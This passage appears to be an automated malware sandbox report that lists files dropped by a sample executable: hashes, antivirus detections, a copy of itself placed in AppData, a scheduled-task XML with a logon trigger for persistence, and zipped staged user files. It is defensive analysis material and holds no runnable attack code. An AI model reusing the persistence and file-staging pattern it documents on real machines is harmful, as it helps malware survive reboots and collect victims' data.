SHA-512:	DF2EA2EDD7A6EEB877B6C5C82BDB91A1EECF96215733293C630783AF6AAA6B4509D13312358B97F865EA07AFFFD995D1F6B97D2587AFE470E6529ABBD580D5BC
Malicious:	false
Preview:	PK.........JDW...s............Files/BJZFPPWAPT.pdf..I.@!.D......8..t....#.@.P.....~].....A786.g.....cf..K.^..0.].p....H..[..Tb..v........4C..?Nw....r.P....Z=...A8).....FF.vc.4....>Z.4.......D".?#l...R).+f.]K.=.4.].^E5W....[........c.W.^}s..hn.3..O.jHj..R....\|.......QAk.!.........F.....;.5.zi....<....'..O....9..Un.:.x>..6..n...Ch...c.IuT..F..#.8.r3..T-g&.S.\...Q.u!..A..g.......(...."..0}Y..`..V...mu...3w...(.ob...........x....@.f... ....0...l.'.....M.H..\|i.9j.&Tq...s..f.}.{I.o.%...GE....G.M"..NxV..S..j....,.`.1].h7..:....X...L[.>k...s.../....E...<t}..3.y4.n..R.G.v.J+....N3...._.K.w{.x.._}.lc...JT{...W`...W[).L/.....a.&U....ggNgA.w.V......(..?PK.........JDWm?..............Files/CZQKSDDMWR.xlsx..I.E!.E..E.7(v....RoH4...#.......+..$&.&..)...k....z..I.:{.....h...6..._.-.......{.U.DS'-u.k_.3..Vnsu.0.\zY.......L.N@B...K.r..N.u.....1..J.@L.)........Q....a.....\|8..7g.kQ....4.....k.>..n....k.<...EO..g.YBY.v..>u.{a..?f.... t..}U..l1..

C:\Users\user\AppData\Local\Temp\OVa08016

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	13722
Entropy (8bit):	7.834040750854896
Encrypted:	false
SSDEEP:	192:J4xYrixcwnfC0nfCV2Ff227MwUnm84On4dqCxJCJgaSYKpIKxTrUaN8Wchb:J4xjd/pP7knx4dqCfyR4fNu1
MD5:	D73135D69A1B4EA0F173B3DE26651A30
SHA1:	EA8D9BCD6B433987F7DFC9E8B76057D58F789ABD
SHA-256:	D8EE383CFFD07F01EE00CDFD84F78AE958E2AA009F815B4C10D1628AFED17E95
SHA-512:	DF2EA2EDD7A6EEB877B6C5C82BDB91A1EECF96215733293C630783AF6AAA6B4509D13312358B97F865EA07AFFFD995D1F6B97D2587AFE470E6529ABBD580D5BC
Malicious:	false
Preview:	PK.........JDW...s............Files/BJZFPPWAPT.pdf..I.@!.D......8..t....#.@.P.....~].....A786.g.....cf..K.^..0.].p....H..[..Tb..v........4C..?Nw....r.P....Z=...A8).....FF.vc.4....>Z.4.......D".?#l...R).+f.]K.=.4.].^E5W....[........c.W.^}s..hn.3..O.jHj..R....\|.......QAk.!.........F.....;.5.zi....<....'..O....9..Un.:.x>..6..n...Ch...c.IuT..F..#.8.r3..T-g&.S.\...Q.u!..A..g.......(...."..0}Y..`..V...mu...3w...(.ob...........x....@.f... ....0...l.'.....M.H..\|i.9j.&Tq...s..f.}.{I.o.%...GE....G.M"..NxV..S..j....,.`.1].h7..:....X...L[.>k...s.../....E...<t}..3.y4.n..R.G.v.J+....N3...._.K.w{.x.._}.lc...JT{...W`...W[).L/.....a.&U....ggNgA.w.V......(..?PK.........JDWm?..............Files/CZQKSDDMWR.xlsx..I.E!.E..E.7(v....RoH4...#.......+..$&.&..)...k....z..I.:{.....h...6..._.-.......{.U.DS'-u.k_.3..Vnsu.0.\zY.......L.N@B...K.r..N.u.....1..J.@L.)........Q....a.....\|8..7g.kQ....4.....k.>..n....k.<...EO..g.YBY.v..>u.{a..?f.... t..}U..l1..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xv1tfy4.ztf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbndha5n.lbn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjm32oau.myp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4tb0rms.wty.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obzzuwdw.i4c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvq2jxys.qey.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbx4nowd.m3r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvgkekjp.e2g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp18B4.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.101768356309752
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtUxvn:cgergYrFdOFzOzN33ODOiDdKrsuTkv
MD5:	2449CA8A3D25567B15F45BF713E18246
SHA1:	169274D8E843681E735FF0C2317BDA091E853F7E
SHA-256:	195BAFB45BC0673488B2A3B2FC2DB1E33F88F53C3979609032B366467EA4549E
SHA-512:	12C8B7DD96B2EEA6B6DA4B85D959CF308D9875FA484C6363C4A1EB3E6EA5636C336B7A8FEFEC63966E34770CB6C93D6230BD21BA02C14041D16493992A243569
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.101768356309752
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtUxvn:cgergYrFdOFzOzN33ODOiDdKrsuTkv
MD5:	2449CA8A3D25567B15F45BF713E18246
SHA1:	169274D8E843681E735FF0C2317BDA091E853F7E
SHA-256:	195BAFB45BC0673488B2A3B2FC2DB1E33F88F53C3979609032B366467EA4549E
SHA-512:	12C8B7DD96B2EEA6B6DA4B85D959CF308D9875FA484C6363C4A1EB3E6EA5636C336B7A8FEFEC63966E34770CB6C93D6230BD21BA02C14041D16493992A243569
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	997888
Entropy (8bit):	7.8390222794545545
Encrypted:	false
SSDEEP:	24576:KtIIee8ckEH0Rdzw0PkzwS47CyxS9ptHzhgQnCBI:xBe8ckEHWG4oHzhgQnM
MD5:	936823354CE6B1D705E73FEA6784B33E
SHA1:	6116D95D45565CC8A82B5CD49F505C8717D37852
SHA-256:	71A2D3CF903F921CC65FBCDDE44707D22939E8C1D520A3A4D80E06985BCDF7A5
SHA-512:	E541747D054B47447A320FD7DECF467C5F37F23F2311CFE45E9C36B978F518554A03573D650B87D9495F7A316E405B875ADC8B6BCC572D211CC75564115DB6B7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P........... ... ....@.. ....................................@.....................................K.... ...L........................................................................... ............... ..H............text...4.... ...................... ..`.rsrc....L... ...N..................@..@.reloc...............8..............@..B........................H.......Hq..................8...........................................U.....A[.............RE...9....;...qUom-...#..m...w..2.My.8)....I...7A..7Ff'.^.....i..T.. #.Mf.6..G....!"..........&.A....>3...............oE......h..,.jF..q.P...6.g......{.....3D..;<.V.:=..BpnDw........`.[......\|b.;..AY^......(..m...G..=@..!r0.E..MQ...Q.}@O.. ....lh?...<n......T.p...[k)..{Q.u...~..y@...{.!.....qH2..5..f@+.k..Y.U'....+..Q.8.i${?.\|..-URw4)[..~..y@...0..........(....*...0..

C:\Users\user\AppData\Roaming\LjlEiSlJe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.4575187496394222
Encrypted:	false
SSDEEP:	3:pjt/lC:NtU
MD5:	98A833E15D18697E8E56CDAFB0642647
SHA1:	E5F94D969899646A3D4635F28A7CD9DD69705887
SHA-256:	FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
SHA-512:	C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
Malicious:	false
Preview:	PK......................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip~RF3c0b08.TMP (copy)

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.4575187496394222
Encrypted:	false
SSDEEP:	3:pjt/lC:NtU
MD5:	98A833E15D18697E8E56CDAFB0642647
SHA1:	E5F94D969899646A3D4635F28A7CD9DD69705887
SHA-256:	FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
SHA-512:	C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
Malicious:	false
Preview:	PK......................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip~RF3c0eb1.TMP (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.4575187496394222
Encrypted:	false
SSDEEP:	3:pjt/lC:NtU
MD5:	98A833E15D18697E8E56CDAFB0642647
SHA1:	E5F94D969899646A3D4635F28A7CD9DD69705887
SHA-256:	FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
SHA-512:	C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
Malicious:	false
Preview:	PK......................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\CZQKSDDMWR.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700739677288544
Encrypted:	false
SSDEEP:	24:ppydEKvTSBiqFHi8v+wyNV+fxloGJjN3y5j1xTEC3ugbIvso8wFjas:rmEKvMiYC8Wwyr88GFAH/UvsuZl
MD5:	57582F5B6AE65D8DFCBD4A26382C6138
SHA1:	DC27AD5E54D1BDCCA4EC0D54ED1FB5A3235E9842
SHA-256:	7918D6E76741E42934BB32547E2D7EA395304AEA3383C0E6B7FCF82ACE125749
SHA-512:	6D75F68E608CB12378605F06C74F2F0414486072CC25961A1EA421B94EA5827F92110B902C2190E04AAE2D79152B0AB9B5B1ACECDCAAADD93A6F25028DD1E060
Malicious:	false
Preview:	CZQKSDDMWRVXFLQDZCLIIZCHKUTASMCLXARWUFPBFEESBCKPMBKHTZOAVUSGWGQBPZXNCLVHGKNWOAOTOSOFYOKUZEGHVYFBBGTMFWOOTOTSLTKZBTPTBZMUKYOSGWCRRYGDZWOEMUMCRRCZIEIYJAYGXMDKNOLEIKRXPEZKZGIXGYJYIBDXPZGYVGHMUCSHXXAYXQQNWIVOLMGKTXTGEAEKAOKQQSCTUWFEFQMLQUREMQDBYWFEQOMAJXVXIMMKWJJFKSSTMQZNWPBIQBZROXFYPWCYBVRMKUOGMEJJHYTWCOZYZXVANCHSTYZHRBVSORLGLSOWPDGEBVMQLDWKSLQFPEZDXWPZYNPSNTKGPNKUHFMAEGDWSDLCDNYFQZWURNIMQZDJNJPPOXINSGMUVHRDBWXOXDRPWKGITAKUVBIDIBIWIIANONNQUMKNATQWTVSOUCLOFKCCAISNABSKDPLNCYIQIFQMVEHZLIAFYDDSJJTQSUEVQKACGQHHXCYTZJABESDNXLIPGYKWXJZQWYJMSZUZHKYCGKQIKCYIWZOHAVHKCRNACDVNLPEXUPOQVKBGVFKCQDKJPNALRMAYMZRBAGMTICYZEFMXXYLDXTMKSZLDKSKSRQTDUDGFZXFQEHEDXVFBYBNEOVKFLNIRSTGZDIJXNRZEZFJHNPZDGPGECJTHNVMTSURANVWOVRBTYGZGIPOXWTRIHNKWFKCTXVVKOFHISZVHNVVRXJGJEZEJDSCKNIDUQYQWFNDXBQQJAYENVZXKXVUERYEPFEGNWBAJHHQSAFTHXGXMHUHJVQEYGVKPBTQMWUEZMBBSFENGBBVZIYHLXFRDPALQUURINJMTQGTPGJRGIWXIXWOPVDTWDBDNJJVXOPMTWAGMWQFUPMRROBBTRTOQBMZKPGWTYPWAVOKTSPLMOWJJDVZIIDATCEGNLHPVRONAQJFLFUZXJVRXMCGQNRKTYBRGRMKBPVPQSPFOIOHXGEGDHOJP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.706547634051575
Encrypted:	false
SSDEEP:	24:hvsWN1mO5uGrz/I7zHH1p0zqzlGo9+kLDw5vXGTxrVYDH+:h3N8O5Rrz/Ww4lGoPLdVg+
MD5:	B8F3A1455E95B1CF3432BF983042773B
SHA1:	F205A118C84B93F8D41F9F3A0C3F5739B308A3BD
SHA-256:	F28BAE1CF8CA75EF22D6F1B09E711B7CE094E88420F0085CD54522F42E2F01CC
SHA-512:	8E565B641B5FD2E12605880EDE93270A75B170462139E0A604E9392EAE17E9ED898657AC5CF3940D6642FA1C30932B5457C5ED3F48945406D8D52FFDAE4C75EC
Malicious:	false
Preview:	DWTHNHNNJBNUOLHJSZISMDGJOYXTZZHUGXLVDUQRAEGRPGUJZOCKQITJDWWXLEKCBGNUXRHFKQNVYEOUAPWVUNRKEGOVRSMLUWJEDVYMGZNTPHFYBRBQKTDCSSUSYEFMSBVJIUZXBZTSOHJUGSMYXMCHCXFJRJWCIMIIBLQTYLCFAYBJJDFARAIASDNTGSCWOVPZQVOLZSDXHBWJKTFKDASDWBZAKTZORAZAYMGQAWYBXYSFHGIFDLGGWKOZHAKPMQDVATIAOQBMHQSPKRBCMODLQIXQPGYLUPHCCYRGFMMUNVADRWLBPHJTZMIBWBBNTGIKVBMISXLSCBVIJKSLAYUGSXYTWZXZEUNPSJHQDCYEUFAEFXVKTZLRWTCCBJEUMWRIOJQZDSKPYAXWZFFGELTRSKYQLZIJELZOOYTMOTXAVQFHZOTOYJRTETJWEYJSIKLGRPKHTDUAISIYRKTOTNIFBGJZDDLKNVDBWZPCZRBGCQVYWVVYPGSOJLVEEYAEGKNLGKHGWDNSTUBBACNMNKWHSEVSQQBPUBUQDPMAYUMOEKRDDULTRBJHROGAKDVOBRFGLXLEPPGPAOSMYHGQPLZVPJQPHVJECMGUAKGHDTRXXACRQCFVKNWHWLHHCPJPVQQVIJGFKFVKEZUOFIJPAGHPJNNXVXIPDRSYFAAUMDAXMMQYHYXSQCVGYKVCLTYUTCPZJEMADJIUEQIXZWEBGFSJRPNCJBGIRLATPCTHDDTOZYQETROWIDHELZOIYGROYRHTLACZEAAOGNJQWDLKLGFABXVJYRCNUWGFVDZUUJMAZAOCPBSGXKYOBTOFSVELAWARUWBQDAJUSVWCITXEQOPHLMEQQFXPPYDIRXJXPELMDYSPWTSNOQKFKNHOSIBCKLQWNBVVZSZKFPEPAAYEMUOZCVBZFPQTOSLEUQFOMZPXBRUFRPVLLIMOKJVZSYBIUFACEGBCKQVRWLXWDOKKECLVGPWOMOUDVXKXHIQF

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.706547634051575
Encrypted:	false
SSDEEP:	24:hvsWN1mO5uGrz/I7zHH1p0zqzlGo9+kLDw5vXGTxrVYDH+:h3N8O5Rrz/Ww4lGoPLdVg+
MD5:	B8F3A1455E95B1CF3432BF983042773B
SHA1:	F205A118C84B93F8D41F9F3A0C3F5739B308A3BD
SHA-256:	F28BAE1CF8CA75EF22D6F1B09E711B7CE094E88420F0085CD54522F42E2F01CC
SHA-512:	8E565B641B5FD2E12605880EDE93270A75B170462139E0A604E9392EAE17E9ED898657AC5CF3940D6642FA1C30932B5457C5ED3F48945406D8D52FFDAE4C75EC
Malicious:	false
